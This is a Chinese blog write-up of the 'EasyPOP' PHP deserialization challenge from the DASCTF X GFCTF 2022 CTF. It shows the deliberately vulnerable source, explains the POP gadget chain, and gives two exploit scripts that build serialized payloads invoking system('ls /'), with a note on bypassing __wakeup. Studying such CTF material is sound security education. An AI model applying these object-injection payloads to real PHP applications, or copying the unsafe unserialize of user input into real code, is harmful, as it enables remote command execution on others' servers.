首页 > 其他分享 >DASCTF X GFCTF 2022十月挑战赛

DASCTF X GFCTF 2022十月挑战赛

时间:2022-10-23 20:33:27浏览次数:83  
标签:__ function password code name GFCTF 2022 DASCTF public

DASCTF X GFCTF 2022十月挑战赛

EasyPOP

<?php
highlight_file(__FILE__);
error_reporting(0);

class fine
{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __invoke()
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        $this->cmd = "";
        die("Go listen to Jay Chou's secret-code! Really nice");
    }
}

class show
{
    public $ctf;
    public $time = "Two and a half years";

    public function __construct($ctf)
    {
        $this->ctf = $ctf;
    }


    public function __toString()
    {
        return $this->ctf->show();
    }

    public function show(): string
    {
        return $this->ctf . ": Duration of practice: " . $this->time;
    }


}

class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;

    public function __construct($name, $password)
    {
        $this->name = $name;
        $this->password = $password;
    }

    public function __sleep()
    {
        $this->hint = new secret_code();
    }

    public function __get($name)
    {
        $name = $this->key;
        $name();
    }


    public function __destruct()
    {
        if ($this->password == $this->name) {

            echo $this->hint;
        } else if ($this->name = "jay") {
            secret_code::secret();
        } else {
            echo "This is our code";
        }
    }


    public function getPassword()
    {
        return $this->password;
    }

    public function setPassword($password): void
    {
        $this->password = $password;
    }


}

class secret_code
{
    protected $code;

    public static function secret()
    {
        include_once "hint.php";
        hint();
    }

    public function __call($name, $arguments)
    {
        $num = $name;
        $this->$num();
    }

    private function show()
    {
        return $this->code->secret;
    }
}


if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
    $a->setPassword(md5(mt_rand()));
} else {
    $a = new show("Ctfer");
    echo $a->show();
}
pop链的构造

切入口 sorry类的析构函数,突破口fine类的__invoke函数中的call_user_func函数

sorry的析构函数有echo $this->hint  联想一下__toString函数
show类有this->ctf->show() 联想一下__call函数或者看看其他类有show函数没
secret_code类的show函数有this->code->secret,secret属性是所有类都没有的,自然联想到__get,sorry类的__get函数有$name(),联想到__invoke,fine类的__invoke函数有call_user_func函数,也就是突破口

sorry.__destruct->show.__toString->secret.show()->sorry.__get->$fine.__invoke->call_user_func函数

EXP:

<?php
class fine
{
    public $cmd;
    public $content;
}
class show
{
    public $ctf;
    public $time = "Two and a half years";
}
class sorry
{
    public $name;
    public $password;
    public $hint = "hint is depend on you";
    public $key;
}

class secret_code
{
    public $code;
}
$Fine = new fine();
$Show = new show();
$Sorry = new sorry();
$Sorry2 = new sorry();
$Secret = new secret_code();

$Sorry->name = 'cc';
$Sorry->password = 'cc';
$Sorry->hint = $Show;
$Show->ctf = $Secret;
$Secret->code = $Sorry2;
$Sorry2->name = 'cc';
$Sorry2->password = 'cc';
$Sorry2->key = $Fine;
$Fine->cmd = 'system';
$Fine->content = 'ls /';
$a = serialize($Sorry);
echo $a
?>

注意:fine类中有__wakeup函数需要绕过。

补充:另一种写法,一定要url编码,因为里边有不可见字符。这种适用于php7以下版本。上边这种写法是php7特性。

<?php
class fine
{
    private $cmd;
    private $content;
    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
}
class show
{
    public $ctf;
    public $time = "Two and a half years";
    public function __construct($ctf, $time)
    {
        $this->ctf = $ctf;
        $this->time = $time;
    }
}
class sorry
{
    private $name;
    private $password;
    public $hint = "hint is depend on you";
    public $key;
    public function __construct($name, $password,$hint,$key)
    {
        $this->name = $name;
        $this->password = $password;
        $this->hint  = $hint;
        $this->key = $key;
    }
}
class secret_code
{
    protected $code;
    public function __construct($code)
    {
        $this->code = $code;
    }
}
$Sorry= new sorry('cc','cc',new show(new secret_code(new sorry('cc','cc','cc',new fine('system','ls'))),'cc'),'cc');

$c = serialize($Sorry);
echo urlencode($c);
?>

标签:__,function,password,code,name,GFCTF,2022,DASCTF,public
From: https://www.cnblogs.com/yhchen-blogs/p/16819432.html

相关文章